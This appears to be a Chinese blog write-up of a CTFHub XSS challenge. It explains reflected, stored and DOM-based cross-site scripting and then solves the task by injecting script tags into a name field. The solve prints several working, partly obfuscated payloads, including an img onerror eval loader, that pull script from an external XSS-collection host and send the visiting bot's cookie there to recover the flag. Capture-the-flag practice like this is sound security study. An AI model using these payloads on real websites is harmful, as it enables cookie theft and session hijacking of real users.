CFTHub XSS

知识点:

XSS(Cross Stte Script):恶意攻击者利用Web页面的漏洞,插入一些恶意代码,当用户访问页面的时候,代码就会执行这个时候就达到了攻击的目的。

JavaScript、Java、VBScrpt、ActiveX、Flash都可以攻击程序

分为反射型(dom也是反射型)和存储型;

dom是利用Html的结构来实现攻击的

反射型:

1、发送带有恶意脚本的链接、代码等

2、服务器接受进行解析与处理

3、脚本一旦执行,攻击就发生了

存储型:

1、攻击者通过表单提交恶意代码,保存在被攻击网址的数据库中

2、正常用户正常查询

3、浏览器解析恶意代码并执行

反射型攻击一次就要提交一次代码,而存储型提交一次就可以,其他用户正常使用网页都可使代码执行

百度的全面解释:XSS攻击_百度百科 (baidu.com)

———————————————————————————————————————————

本题:在What's your name里输入代码:<script>alert(1)</script> 发现弹出弹窗

则在下面的Send URL to Bot中发现需要写入url(网址)输入网站,根据返回Successfully可以判断,该网站会在后台进行访问。

XSS平台 - 仅用于xss安全测试专用 (xssaq.com)

中创建项目,名字随便起,默认模块;

点击右上角的查看代码:

将上方的绿色标记的截取:

<sCRiPt sRC=https://xssaq.com/YddH></sCrIpT>

{补充:

</tExtArEa>'"><sCRiPt sRC=https://xssaq.com/YddH></sCrIpT>
</tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22https%3A%2F%2Fxssaq.com%2FYddH%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xssaq.com/YddH';>

(↓↓↓!~极限代码~支持https!(可以不加最后的>回收符号,下面代码已测试成功)↓↓↓)

<sCRiPt/SrC=https://xssaq.com/YddH>

}

将网页复制到Send URL to Bot中,name后面字段换成<sCRiPt sRC=https://xssaq.com/YddH></sCrIpT>即可在XSS Platform中获得发送的内容,可以看到Cookie中的flag。

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值